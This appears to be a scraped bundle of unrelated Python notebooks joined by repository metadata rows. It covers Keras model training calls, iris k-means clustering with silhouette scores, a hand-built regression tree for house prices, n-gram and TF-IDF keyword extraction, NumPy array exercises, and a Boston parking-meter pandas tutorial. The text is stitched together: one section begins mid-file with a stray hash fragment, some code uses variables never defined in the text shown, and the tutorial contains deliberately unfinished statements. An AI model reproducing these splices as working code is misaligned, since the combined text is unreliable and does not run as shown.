model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="LL4mcfFyBQvL" colab_type="code" colab={}
model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="56V6w8FQBQvP" colab_type="code" colab={} outputId="7d4f1eac-0dc0-419e-abf8-427af77dfe8d"
model.fit_generator(train_gen, steps_per_epoch=train_gen.n, epochs=100, validation_data=test_gen,validation_steps=test_gen.n,callbacks=[TrainValTensorBoard(write_graph=False)])
# + id="EfW6rz5cBQvY" colab_type="code" colab={}
# + id="dj4k2JlzBQvf" colab_type="code" colab={}
# + id="S_JiPO00BQvm" colab_type="code" colab={} outputId="a0deb7ac-e6aa-491c-e638-a875a2b1eb96"
hist.history
# + id="oQhOCia-BQvs" colab_type="code" colab={}
model.save_weights('ep108.h5')
# + id="zadim11PBQvx" colab_type="code" colab={}
pred = model.predict_classes(testData)
# + id="A0gy2Z5rBQv6" colab_type="code" colab={} outputId="bd38d90f-dba4-42e6-dcfd-5b87b8f05701"
for i in pred:
print(i)
# + id="GTCnTWffBQwB" colab_type="code" colab={}
# + id="FtFeRWgfBQwH" colab_type="code" colab={}
# + id="PzSR0JafBQwN" colab_type="code" colab={}
# + id="VE3h1f9uBQwV" colab_type="code" colab={}
# + id="bFXCz23ZBQwZ" colab_type="code" colab={}
# + id="XNz2ZlFdBQwg" colab_type="code" colab={}
# + id="7vXXwN99BQwq" colab_type="code" colab={}
# + id="Rs9O-1nj2I-y" colab_type="code" colab={}
# + id="c1F_Ts492JDG" colab_type="code" colab={}
| 91,251 |
/.ipynb_checkpoints/Project1-checkpoint.ipynb
|
89cb5d1198c9430401fe4c6504d9d79ea764ae69
|
[] |
no_license
|
ujcheon/Data_Mining
|
https://github.com/ujcheon/Data_Mining
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 60,622 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction to Data Mining - Project 1
# ID: 1813128
#
# Name: 천유정
# 1) iris데이터를 이용한 클러스터 예제에서 실루엣 계수를 계산하는 라인을 추가하여 Petal width와 petal length를 사용했을 때 클러스터를 평가해보자
# +
# code for problem 1
from sklearn import cluster, datasets
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn import metrics
iris = datasets.load_iris()
X = iris.data[:,2:]
y = iris.target
k_means= cluster.KMeans(n_clusters=3).fit(X)
y_pred = k_means.predict(X)
plt.scatter(X[:,0],X[:,1],c=y_pred, cmap='viridis', edgecolor='k')
plt.xlabel('Petal length')
plt.ylabel('Petal width')
plt.scatter(k_means.cluster_centers_[:,0],k_means.cluster_centers_[:,1],c=[0,1,2], cmap='viridis', marker='^',
s=200, edgecolor='k')
plt.axis([0,X[:,0].max()+0.2,0,X[:,1].max()+0.2])
plt.show()
# 실루엣 계수
cluster_labels = y_pred
S = metrics.silhouette_score(X,cluster_labels)
print("silhouette score = {:f}".format(S))
# -
# ## ==========================================================
# 2) Sepal width와 sepal length를 사용하여 동일한 클러스터 예제를 수행해보고, 시각화 및 실루엣 계수를 계산하여 1)의 결과와 비교해보자.
# +
# code for problem 2
iris = datasets.load_iris()
X = iris.data[:,:2]
y = iris.target
k_means= cluster.KMeans(n_clusters=3).fit(X)
y_pred = k_means.predict(X)
plt.scatter(X[:,0],X[:,1],c=y_pred, cmap='viridis', edgecolor='k')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.scatter(k_means.cluster_centers_[:,0],k_means.cluster_centers_[:,1],c=[0,1,2], cmap='viridis', marker='^',
s=200, edgecolor='k')
plt.axis([0,X[:,0].max()+0.4,0,X[:,1].max()+0.4])
plt.show()
# 실루엣 계수
cluster_labels = y_pred
S = metrics.silhouette_score(X,cluster_labels)
print("silhouette score = {:f}".format(S))
# -
# # 비교 설명
#
# ### 시각화 : 1번은 2번에 비해 클러스터가 서로 떨어져 있어서 겹치는 부분이 적어 클러스터간의 분리가 잘 되어 있는 것 처럼 보인다. 반면, 2번은 데이터 포인트가 몰려있어서 겹치는 부분이 1번에 비해 많다. 클러스터 사이의 거리가 가까워 클러스터링이 1번에 비해 잘 되지 않은 걸로 보인다.
#
# ### 실루엣 계수 : 실루엣 계수는 1번은 0.660480 이고, 2번은 0.445053 라고 나왔다. 1번이 더 높은 것으로 보아 1번이 2번보다 클러스터 내의 응집이 더 잘된 것으로 볼 수 있다. 또한 클러스터 간의 분리도 1번이 더 잘된 것으로 볼 수 있다.
| 2,306 |
/Regression_Tree/Regression_Tree.ipynb
|
5aea541611335cd08e3566dbe2ffc843bd400aaa
|
[] |
no_license
|
ShubhamAgrawal-13/Machine-Learning
|
https://github.com/ShubhamAgrawal-13/Machine-Learning
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 238,977 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Question 3 : Decision Tree (Regression Tree)
# In this question, we have to predict the saleprice.
# Let us first import all the necessary libraries like numpy, panda, matplotlib , etc. and
# sklearn.metrics for calculating F1-Score, Confusion Matrix, r2_score, mean squared error, etc.
# ### Import Libraries
import numpy as np
import pandas as pd
from matplotlib import pyplot as mpl
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import f1_score
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
# Let us see what our data set contains.
train_data=pd.read_csv('Datasets/q3/train.csv')
train_data
test_data=pd.read_csv('Datasets/q3/test.csv')
test_data
test_label=pd.read_csv('Datasets/q3/test_labels.csv',header=None)
test_label
# ### Preprocessing
# Now, First we will preprocess the data. By preprocessing, we mean that
#
# 1: If the column contains more than half Nan values, then we will drop that column.
#
# 2: Otherwise, For categorical data, we fill nan value by mode of the column
# and For Numerical data, we fill nan value by mean of the column.
#
# To find whether the data is categorical or not.
# we have is_categorical() function.
def is_categorical(array):
    """Return True when `array` (numpy array / pandas Series) has an object
    dtype, i.e. holds generic Python objects such as strings — treated as
    categorical data throughout this notebook."""
    dtype_name = array.dtype.name
    return dtype_name == 'object'
# +
# Columns whose missing-value count exceeds the threshold are dropped
# entirely ('Id' is dropped too — it carries no predictive signal).
nan_col=['Id']
# NOTE(review): 1000 is a hard-coded row count — len(train_data) would be
# safer if the training set size ever changes.
threshold=int(1000*0.55)
for col in train_data:
    no_of_nan=len(train_data[col])-train_data[col].count()
    #print(no_of_nan)
    if(no_of_nan>threshold):
        nan_col.append(col)
#print(nan_col)
train_data.drop(nan_col, axis = 1, inplace = True)
test_data.drop(nan_col, axis = 1, inplace = True)
# Remaining NaNs: mode-impute categorical columns, mean-impute numeric ones.
# Iterating test_data's columns skips 'SalePrice', which only train has.
for col in test_data:
   # print(train_data[col].dtype)
    if(is_categorical(train_data[col])):
       # print(col,'cat')
        train_data[col].fillna(train_data[col].mode()[0],inplace=True)
        test_data[col].fillna(test_data[col].mode()[0],inplace=True)
    else:
        #print(col,'num')
        train_data[col].fillna(train_data[col].mean(),inplace=True)
        test_data[col].fillna(test_data[col].mean(),inplace=True)
# -
# ### Weighted Mean Squared Error
# There is function calculate_mse() which calculate mse (mean squared error).
# Now, we will check mse for each column and column with minimum mse.
#
# Here, to calculate mse for a particular column, we have to calculate mse for every unique element in the mse and the minimum mse will be the column mse.
#
# for each unique val in column:
#
# splitting is done for categorical and numerical data;
#
# for categorical data :
#
# column values == val and column values != val
#
# for numerical data :
#
# column values <= val and column values > val
#
# function :
def calculate_mse(train_data):
    """Find the split of `train_data` that minimises the weighted MSE of 'SalePrice'.

    Every column except the last ('SalePrice') is considered; for each unique
    value in a column the rows are partitioned with == / != (object-dtype,
    i.e. categorical columns) or <= / > (numeric columns), and the weighted
    mean squared error of 'SalePrice' over the two partitions is computed.

    Bug fix vs. the original: the per-partition error is now a true *mean*
    squared error before being size-weighted. The original summed squared
    errors and then multiplied by the partition length again, so partition
    sizes were double-counted and large partitions were over-penalised.

    :param train_data: DataFrame whose last column is 'SalePrice'
    :return: [best weighted MSE, best split value, best column name]
             ([inf, 0, 0] when no non-degenerate split exists)
    """
    best_mse = float('inf')   # replaces the magic 9999... sentinels
    best_split = 0
    best_col = 0
    n_rows = len(train_data)
    for col in train_data.columns[:-1]:
        # object dtype == categorical (inlined from is_categorical())
        categorical = train_data[col].dtype.name == 'object'
        for val in train_data[col].unique():
            if categorical:
                left = train_data[train_data[col] == val]
                right = train_data[train_data[col] != val]
            else:
                left = train_data[train_data[col] <= val]
                right = train_data[train_data[col] > val]
            len1 = left.shape[0]
            len2 = right.shape[0]
            if len1 == 0 or len2 == 0:
                # degenerate split (one side empty) can never be chosen
                continue
            sp1 = left['SalePrice'].to_numpy()
            sp2 = right['SalePrice'].to_numpy()
            mse1 = np.mean((sp1 - np.mean(sp1)) ** 2)
            mse2 = np.mean((sp2 - np.mean(sp2)) ** 2)
            weighted = (mse1 * len1 + mse2 * len2) / n_rows
            # strict < keeps the first of equally good splits, matching the
            # original tie-breaking behaviour
            if weighted < best_mse:
                best_mse = weighted
                best_split = val
                best_col = col
    return [best_mse, best_split, best_col]
# Now, we will build the decision tree. For that, I have made a class DecisionTree in which build() function is there.
#
# Each node in tree contains :
#
# 1. Left Child
# 2. Right Child
# 3. Val for splitting
# 4. mean of dataset of node
# 5. depth of the node
# 6. Column for splitting
#
class Node:
    """A single node of the regression tree.

    Holds the split description chosen by calculate_mse() plus a fallback
    prediction (`mean`) used when routing stops at this node.
    """
    def __init__(self, data, split, split_col, depth):
        # children start empty; DecisionTree.build() fills them in
        self.left = self.right = None
        self.data = data            # [mse, split value, split column] triple
        self.mean = 0               # leaf prediction, assigned after construction
        self.split = split          # threshold / category to compare against
        self.split_col = split_col  # column name used for the comparison
        self.depth = depth          # depth of this node in the tree (root = 0)
# +
class DecisionTree:
    """Regression tree over a DataFrame whose target column is 'SalePrice'.

    build() grows the tree recursively, choosing splits with calculate_mse();
    predict() routes each test row down the tree and returns the prediction
    stored at the deepest reachable node.
    """
    def __init__(self):
        # root is assigned externally: dt.root = dt.build(train_data, 0)
        self.root=None
    def getRoot(self):
        """Accessor for the root node."""
        return self.root
    def build(self,data,depth):
        """Recursively build the subtree for `data`; returns its root Node.

        Stopping rules: depth > 13 or fewer than 4 rows (both hard-coded
        hyper-parameters). Categorical columns split with ==/!=, numeric
        columns with <=/>.
        """
        if(depth>13):
            return None
        if(data.shape[0]<4):
            return None
        m=calculate_mse(data)
        print(m)  # debug trace of every chosen split [mse, value, column]
        col=m[2]
        df1=[]
        df2=[]
        if(is_categorical(data[col])):
            df1=data[data[col]==m[1]]
            df2=data[data[col]!=m[1]]
        else:
            df1=data[data[col]<=m[1]]
            df2=data[data[col]>m[1]]
        # print('df1 : ',len(df1))
        # print('df2 : ',len(df2))
        # print('depth : ',depth)
        node=Node(m,m[1],m[2],depth)
        # NOTE(review): when the *split column* is categorical the node's
        # prediction is the mode of SalePrice rather than the mean — unusual
        # for a regression tree; confirm this is intended.
        if(is_categorical(data[col])):
            node.mean=data['SalePrice'].mode()[0]
        else:
            node.mean=data['SalePrice'].mean()
        node.left=self.build(df1,depth+1)
        node.right=self.build(df2,depth+1)
        return node
    def predicted(self,test_data,i,root):
        """Route row `i` of `test_data` down the subtree at `root` and return
        the prediction of the deepest reachable node."""
        if(root.left==None and root.right==None):
            return root.mean
        #print(root.split_col)
        val=test_data[root.split_col][i]
        # comparison style (==/<=) is chosen from the *test* column's dtype;
        # assumed to match the training dtype after preprocessing — confirm
        if(is_categorical(test_data[root.split_col])):
            if(val==root.split):
                if(root.left==None):
                    return root.mean
                else:
                    return self.predicted(test_data,i,root.left)
            else:
                if(root.right==None):
                    return root.mean
                else:
                    return self.predicted(test_data,i,root.right)
        else:
            if(val<=root.split):
                if(root.left==None):
                    return root.mean
                else:
                    return self.predicted(test_data,i,root.left)
            else:
                if(root.right==None):
                    return root.mean
                else:
                    return self.predicted(test_data,i,root.right)
    def predict(self,test_data,root):
        """Predict SalePrice for every row of `test_data`; returns a list."""
        result=[]
        for i in range(test_data.shape[0]):
            #print("--------")
            result.append(self.predicted(test_data,i,root))
        #print(result)
        return result
# -
# ### Function to find inorder traversal of the tree
def inorder(root):
    """Print each node's data and depth via an in-order (left, self, right) walk."""
    if root is None:
        return
    inorder(root.left)
    print(root.data, root.depth)
    inorder(root.right)
# ### Now, we build the decision tree and by creating the DecisionTree object
dt=DecisionTree()
# Fit the tree on the training split, growing the root from depth 0.
dt.root=dt.build(train_data,0)
#inorder(dt.root)
# Predict SalePrice for every row of the held-out split.
result=dt.predict(test_data,dt.root)
# ## Printing inorder traversal of Decision Tree
inorder(dt.root)
# ### Printing the prediction result
result
# # Testing Metrics
#
# ## R2 Score
# R-squared (R2) is a statistical measure that represents the proportion of the variance for a dependent variable that's explained by an independent variable or variables in a regression model.
r2_score(result,test_label[1].to_numpy())
# ## Mean Squared Error
# In statistics, the mean squared error (MSE) or mean squared deviation (MSD) of an estimator (of a procedure for estimating an unobserved quantity) measures the average of the squares of the errors—that is, the average squared difference between the estimated values and the actual value.
mean_squared_error(result,test_label[1].to_numpy())
# ## Mean Absolute Error
# In statistics, mean absolute error (MAE) is a measure of difference between two continuous variables. Assume X and Y are variables of paired observations that express the same phenomenon.
mean_absolute_error(result,test_label[1].to_numpy())
# NOTE(review): `mpl` is presumably matplotlib.pyplot imported earlier in the
# notebook, and the axis labels below look swapped relative to what is
# plotted (predictions in red, true labels as the second series) -- confirm.
mpl.plot(result,'r-',test_label[1].to_numpy(),label='SalePrice')
mpl.ylabel('test_labels price')
mpl.xlabel('predicted price')
mpl.legend()
9354fae70"
#Most frequently occuring words
def get_top_n_words(corpus, n=None):
    """Return the *n* most frequent single words in *corpus*.

    Fits a CountVectorizer, sums word counts over all documents, and
    returns (word, count) tuples sorted by count, largest first.
    n=None returns every word.
    """
    vectorizer = CountVectorizer().fit(corpus)
    counts = vectorizer.transform(corpus).sum(axis=0)
    freqs = [(word, counts[0, idx]) for word, idx in vectorizer.vocabulary_.items()]
    freqs.sort(key=lambda pair: pair[1], reverse=True)
    return freqs[:n]
#Convert most freq words to dataframe for plotting bar plot
top_words = get_top_n_words(corpus, n=20)
top_df = pd.DataFrame(top_words)
top_df.columns=["Word", "Freq"]
#Barplot of most freq words (top 20 unigrams)
import seaborn as sns
sns.set(rc={'figure.figsize':(13,8)})
g = sns.barplot(x="Word", y="Freq", data=top_df)
# Tilt the tick labels so long words don't overlap.
g.set_xticklabels(g.get_xticklabels(), rotation=30)
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="lydk1YLgvNpt" outputId="fec8f1fe-f6ad-483b-add7-61b40617e0b9"
#Most frequently occuring Bi-grams
def get_top_n2_words(corpus, n=None):
    """Return the *n* most frequent bigrams in *corpus*.

    Only the 2000 most frequent bigrams are considered (max_features).
    Result is a list of (bigram, count) tuples in descending count order;
    n=None returns all of them.
    """
    vectorizer = CountVectorizer(ngram_range=(2,2),
                                 max_features=2000).fit(corpus)
    counts = vectorizer.transform(corpus).sum(axis=0)
    freqs = [(phrase, counts[0, idx]) for phrase, idx in vectorizer.vocabulary_.items()]
    freqs.sort(key=lambda pair: pair[1], reverse=True)
    return freqs[:n]
# Top 20 bigrams, tabulated and plotted.
top2_words = get_top_n2_words(corpus, n=20)
top2_df = pd.DataFrame(top2_words)
top2_df.columns=["Bi-gram", "Freq"]
print(top2_df)
#Barplot of most freq Bi-grams
import seaborn as sns
sns.set(rc={'figure.figsize':(13,8)})
h=sns.barplot(x="Bi-gram", y="Freq", data=top2_df)
# Rotate labels: two-word phrases are wide.
h.set_xticklabels(h.get_xticklabels(), rotation=45)
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="ak4yaE3_gjp5" outputId="1ec84783-70fb-42e1-b658-50eb8a8db870"
#Most frequently occuring Tri-grams
def get_top_n3_words(corpus, n=None):
    """Return the *n* most frequent trigrams in *corpus*.

    Only the 2000 most frequent trigrams are considered (max_features).
    Result is a list of (trigram, count) tuples in descending count order;
    n=None returns all of them.
    """
    vectorizer = CountVectorizer(ngram_range=(3,3),
                                 max_features=2000).fit(corpus)
    counts = vectorizer.transform(corpus).sum(axis=0)
    freqs = [(phrase, counts[0, idx]) for phrase, idx in vectorizer.vocabulary_.items()]
    freqs.sort(key=lambda pair: pair[1], reverse=True)
    return freqs[:n]
# Top 20 trigrams, tabulated and plotted.
top3_words = get_top_n3_words(corpus, n=20)
top3_df = pd.DataFrame(top3_words)
top3_df.columns=["Tri-gram", "Freq"]
print(top3_df)
#Barplot of most freq Tri-grams
import seaborn as sns
sns.set(rc={'figure.figsize':(13,8)})
j=sns.barplot(x="Tri-gram", y="Freq", data=top3_df)
# Rotate labels: three-word phrases are wide.
j.set_xticklabels(j.get_xticklabels(), rotation=45)
# + id="cMbnelqRvs4w"
from sklearn.feature_extraction.text import TfidfTransformer
# Learn IDF weights from the unigram count matrix X built earlier with the
# CountVectorizer `cv`.
tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)
tfidf_transformer.fit(X)
# get feature names
# NOTE(review): get_feature_names() was removed in scikit-learn >= 1.2 in
# favour of get_feature_names_out() -- confirm the installed version.
feature_names=cv.get_feature_names()
# fetch document for which keywords needs to be extracted
# doc=corpus[532]
# Concatenate the whole corpus into one "document" so the keywords cover
# every text at once.
doc=""
for line in corpus:
    # NOTE(review): repeated += on a string is O(n^2);
    # "".join(map(str, corpus)) would be linear.
    doc= doc + str(line)
#generate tf-idf for the given document
tf_idf_vector=tfidf_transformer.transform(cv.transform([doc]))
# + colab={"base_uri": "https://localhost:8080/"} id="kqlAA-hmvy48" outputId="08a044e4-3f16-478e-e867-993771d1babc"
#Function for sorting tf_idf in descending order
from scipy.sparse import coo_matrix
def sort_coo(coo_matrix):
    """Return (column_index, value) pairs of a sparse COO matrix,
    sorted by value (ties broken by column index), largest first."""
    entries = list(zip(coo_matrix.col, coo_matrix.data))
    entries.sort(key=lambda entry: (entry[1], entry[0]), reverse=True)
    return entries
def extract_topn_from_vector(feature_names, sorted_items, topn=10):
    """Map the *topn* leading entries of *sorted_items* to their feature names.

    Args:
        feature_names: sequence indexable by feature id.
        sorted_items:  (feature_id, score) pairs, already sorted by score.
        topn:          how many leading pairs to keep.

    Returns:
        dict of feature name -> score rounded to 3 decimals, preserving the
        order of *sorted_items*.
    """
    results = {}
    for feature_id, score in sorted_items[:topn]:
        results[feature_names[feature_id]] = round(score, 3)
    return results
#sort the tf-idf vectors by descending order of scores
sorted_items=sort_coo(tf_idf_vector.tocoo())
#extract only the top n; n here is 30
keywords=extract_topn_from_vector(feature_names,sorted_items,30)
# now print the results: the full text followed by each keyword and its
# tf-idf score
print("\nText:")
print(doc)
print("\nKeywords:")
for k in keywords:
    print(k,keywords[k])
| 13,760 |
/Exercise_3.ipynb
|
72fc1435656947889f608f7c9b1f5792c3740a37
|
[] |
no_license
|
SEB91QA/Python-Exercises
|
https://github.com/SEB91QA/Python-Exercises
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 33,578 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## 1) Create an array of $9$ evenly spaced numbers going from $0$ to $29$ (inclusive) and give it the variable name $r$. Find the square of each element of the array (as simply as possible). Find twice the value of each element of the array in two different ways: $(i)$ using addition and $(ii)$ using multiplication. Print out the array $r$ and each output requested above.
# +
import numpy as np
# 9 evenly spaced values from 0 to 29 inclusive (step is 29/8 = 3.625).
r = np.linspace(0, 29, 9)
#Square of each element
sqr = r**2
#Twice the value of each element
#(i) Sum
sm = r + r
#(ii) Multiplication
mlt = 2*r
print(r)
print(sqr)
print(sm)
print(mlt)
# -
# ## 2) Create the following arrays:
#
# ### a) an array of $100$ elements all equal to $e$, the base of the natural logarithm
#
# ### b) an array in 1-degree increments of all the angles in degrees from $0$ to $360$ degrees inclusive;
#
# ### c) an array in 1-degree increments of all the angles in radians from $0$ to $360$ degrees inclusive. Verify your answers by showing that $c-b*np.pi/180$ gives an array of zeros (or nearly zeros) where b and c are the arrays you created in parts (b) and (c);
#
# ### d) an array from $12$ to $17$, not including $17$, in $0.2$ increments;
#
# ### e) an array from $12$ to $17$, including $17$, in $0.2$ increments;
# +
import numpy as np
#(a)
e = np.ones(100)
ex = np.exp(1)*e
# -
ex
# +
#(b)
b = np.arange(0, 361, 1)
b
# +
#(c)
c = np.radians(b)
c
# -
c_2 = c-b*(np.pi/180)
c_2
# +
#(d)
np.arange(12., 17., 0.2)
# -
#(e)
np.arange(12., 17.2, 0.2)
# ## 3) The position of a ball at time $t$ dropped with zero initial velocity from a height $h_{0}$ is given by
#
# \begin{equation}
# y = h_{0} - \frac{1}{2}gt^{2}
# \end{equation}
#
# ## where $g = 9.8 m/s^{2}$. Suppose $h_{0} = 10m$. Find the sequence of times when the ball passes each half meter assuming the ball is dropped at $t = 0$. Hint: Create a NumPy array for $y$ that goes from $10$ to $0$ in increments of $−0.5$ using the arange function. Solving the above equation for $t$, show that
#
# \begin{equation}
# t = \sqrt{\frac{2(h_{0}-y)}{g}}
# \end{equation}
#
# ## Using this equation and the array you created, find the sequence of times when the ball passes each half meter. Save your code as a Python script. It should yield the following results for the $y$ and $t$ arrays:
# +
import numpy as np
h_0 = 10
y = np.arange(10., 0., -0.5)
y
# -
t = np.sqrt((2*(10 - y))/(9.8))
t
list(zip(t,y))
# ## 4) Recalling that the average velocity over an interval $\Delta t$ is defined as $\bar{v}$ = $\Delta y/\Delta t$, find the average velocity for each time interval in the previous problem using NumPy arrays. Keep in mind that the number of time intervals is one less than the number of times. Hint: What are the arrays $y[1:20]$ and $y[0:19]$? What does the array $y[1:20]-y[0:19]$ represent? (Try printing out the two arrays from the IPython shell.) Using this last array and a similar one involving time, find the array of average velocities. Bonus: Can you think of a more elegant way of representing $y[1:20]-y[0:19]$ that does not make explicit reference to the number of elements in the $y$ array—one that would work for any length array?
#
y
t
y[1:20]
y[0:19]
y[1:20] - y[0:19]
t[1:20]
t[0:19]
t[1:20]-t[0:19]
v = (y[1:20] - y[0:19])/(t[1:20]-t[0:19])
v
# ### Using the $b[:-1]$
y[1:]
y[:-1]
v_2 = (y[:-1]-y[1:])/(t[:-1]-t[1:])
v_2
# ## Bonus: Calculate the acceleration as a function of time using the formula $\bar{a} = \Delta v/\Delta t$. Take care, as you will need to define a new time array that corresponds to the times where the velocities are calculated, which is midway between the times in the original time array. You should be able to justify the answer you get for the array of accelerations.
# The average velocities v_2 correspond to the *midpoints* of the original
# time intervals (as the exercise states), so the matching time array is the
# midpoint of each consecutive pair of times.  The original code used the
# interval differences t[:-1]-t[1:] as a "time" array, which is not a time
# axis at all -- hence the author's doubt in the old comment.
t_2 = (t[:-1] + t[1:]) / 2
t_2
# Acceleration = change in average velocity over change in midpoint time;
# for free fall this should be constant and close to -9.8 m/s^2.
a = (v_2[:-1] - v_2[1:]) / (t_2[:-1] - t_2[1:])
a
# ## 5) Perform the following tasks with NumPy arrays. All of them can be done (elegantly) in $1$ to $3$ lines.
#
# ### (a) Create an $8\times8$ array with ones on all the edges and zeros everywhere else.
#
# ### (b) Create an $8\times8$ array of integers with a checkerboard pattern of ones and zeros.
#
# ### (c) Given the array $c = np.arange(2, 50, 5)$, make all the num- bers not divisible by $3$ negative.
#
# ### (d) Find the size, shape, mean, and standard deviation of the arrays you created in parts $(a)–(c)$.
#
# +
#(a)
import numpy as np
# 8x8 of ones, then zero the interior so only the border keeps 1s.
a = np.ones((8,8))
a[1:-1,1:-1] = 0 #In each line it starts with the line 1 and it goes to -1 (The last element)
# +
#(b)
# Checkerboard: zero the odd columns of even rows and the even columns of
# odd rows, leaving alternating ones and zeros.
b = np.ones((8,8))
b[::2,1::2] = 0
b[1::2,::2] = 0
b
# +
#(c)
c = np.arange(2, 50, 5)
# The exercise asks to make the numbers NOT divisible by 3 negative; the
# original mask (c % 3 == 0) negated the multiples of 3 instead.
c[c % 3 != 0] *= -1
c
# +
#(d)
#(a-d)
print(a.shape)
print(a.size)
print(a.mean())
a.std()
# +
#(b-d)
print(b.shape)
print(b.size)
print(b.mean())
b.std()
# +
#(c-d)
print(c.shape)
print(c.size)
print(c.mean())
c.std()
# -
| 5,158 |
/04_ML/52_OpenCV_drawing.ipynb
|
ccdf19de87fcc8c2c2fca8f3f5adae01053e8633
|
[] |
no_license
|
kkobooc/DSS
|
https://github.com/kkobooc/DSS
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 650,812 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Metered Parking in Boston
# We are going to do some analysis on what metered parking is available in the Boston area, using data taken from Boston's [Open Data Portal](https://data.boston.gov/dataset/parking-meters).
#
# This file is available in the repository as a [csv](https://www.computerhope.com/issues/ch001356.htm) (comma seperated value file, similar to the type of tabular data you would work with in excel).
# 
# #### Exercise Notes:
# `Syntax will be contained in code blocks like this.`
#
# *Italicized portions of the example syntax should be replaced with the your variables*. Normal text (not italicized) should be copied precisely.
#
# We will cover:
# [Step 1: Importing Libraries](#Step-1:-Import-the-libraries-you-plan-to-use)
# [Step 2: Loading a CSV](#Step-2:-Loading-a-CSV)
# [Step 3: Exploring the data](#Step-3:-Exploring-the-data)
# [Step 4: Reorganizing the Data](#Step-4:-Reorganizing-the-Data)
# [Step 5: Mapping the Data](#Step-5:-Mapping-the-Data)
# [Step 6: Exporting Files](#Step-6:-Exporting-Files)
#
#
#
# ## Step 1: Import the libraries you plan to use
#
# (This is done in the first lines of your script. Always keep in mind that the script will run in order and won't have access to variables and functions set later in the file, just as you wouldn't be able to give someone the weather report if you hadn't looked it up yet.)
#
# We will use:
# - [pandas](https://pandas.pydata.org/pandas-docs/stable/reference/index.html). This library allows us to easily manipulate and analyze data structures.
# - [folium](https://python-visualization.github.io/folium/) for data vizualization with leaflet maps
# - [geopy](https://github.com/geopy/geopy) for converting coordinates to addresses (reverse geocoding)
#
# importing "as pd" allows us nickname pandas so that instead of typing the full name later, we can substitute "pd"
# Example: (pandas.dataframe.columns can instead be typed pd.dataframe.columns)
import pandas as pd
import geopandas as gp
from geopy.geocoders import Nominatim
from geopy.extra.rate_limiter import RateLimiter #optional for our purposes
import folium
#
# ## Step 2: Loading a CSV
# 
#
# Pandas comes with built in functionality to read in a csv
# The syntax is:
# `pd.read_csv('`*`file_path`*`')`
#
# To make this file easier to refer back to later, we are going to save it to a variable name of our choice. I'm going to call it boston_meters.
# +
# Remember, variable names cannot contain spaces,
# To make the name more readable you can separate words with-a-dash or_with_underscores
boston_meters = pd.read_csv('./data/parking_meters_boston.csv')
charlestown_pay = pd.read_csv('./data/charlestown_pay.csv')
# -
#load the charlestown_location.csv
charlestown_locations =
#
#
# ## Step 3: Exploring the data
# There are several techniques we can use to get a sense of what sort of data is available.
#
# Keep in mind that the code that is run will not automatically display results. If you want the program to report back to you, you will need to wrap the command (or the variable it is saved to) in a print funtion
#
# #### How many datapoints?
# To start, let's find out how much data we are dealing with. Since each row gives information about a specific parking meter, we can find out how many parking meters are reported in this dataset by getting a row count for our CSV.
#
# The syntax is:
# *`dataframe`*`.shape`
# +
# Remember we named our dataframe "boston_meters" in step 2
# Keep in mind that the code that is run will not automatically display results.
#If you want the program to report back to you, you will need to wrap the command (or the variable) in a print funtion
print()
# -
# #### What columns does this csv have?
# Let's take a look at the data available in the csv by printing the column headings. The data structure is identical for the Charlestown and Boston dataframes.
#
# The syntax is:
# *`pd.dataframe`*`.columns`
print()
# #### How many cells are missing Data?
#
# Syntax:
# *`dataframe`*`.isnull().sum()`
#
# Calculate missing values
# #### Finding all unique values
# Dataframe 1 tells us which vendors service the meters in the "VENDOR" column. How many vendors service the boston area meters?
# Syntax: *`dataframe.column`*`.unique()`
print(boston_meters.VENDOR.unique())
# +
# What are the distinct types of pay policies for meters?
print()
# -
#
#
#
#
# ## Step 4: Reorganizing the Data
# #### Dropping Columns and Rows
# Since we will ultimately be putting this data on a map, we would like to drop all values that don't include a location. We will filter which NaN values to drop by specifying a subset of columns.
#
# Syntax:
# *`DataFrame`*`.dropna(axis=0, how='any', thresh=None, subset=None, inplace=False)`
# DataFrame.drop(self, labels=None, axis=0, index=None, columns=None, level=None, inplace=False, errors='raise')
edited_columns = boston_meters.drop(['TOW_AWAY','G_DISTRICT', 'G_ZONE', 'G_SUBZONE', 'METER_ID'], axis=1)
edited_columns.head()
# You can also drop no data values
#
# Syntax:
# *`dataframe`*`.dropna(subset=['column1', 'column2'])`
#
# +
#Drop the rows that have no data in columns: LATITUDE AND LONGITUDE
#no_na =
# -
# ##### Merging Dataframes
#
# 
#
# We have a dataframe listing parking meters for Charlestown and another dataframe listing parking meters for Boston.
# Try combining these two into one dataframe.
#
#
# Syntax: *`dataframe`*`.merge(`*`dataframe_2`*`, how = "")` (Default is inner merge)
#
#We will merge charlestown_pay & charlestown_locations
charlestown_meters = charlestown_pay.merge(charlestown_locations, how="outer")
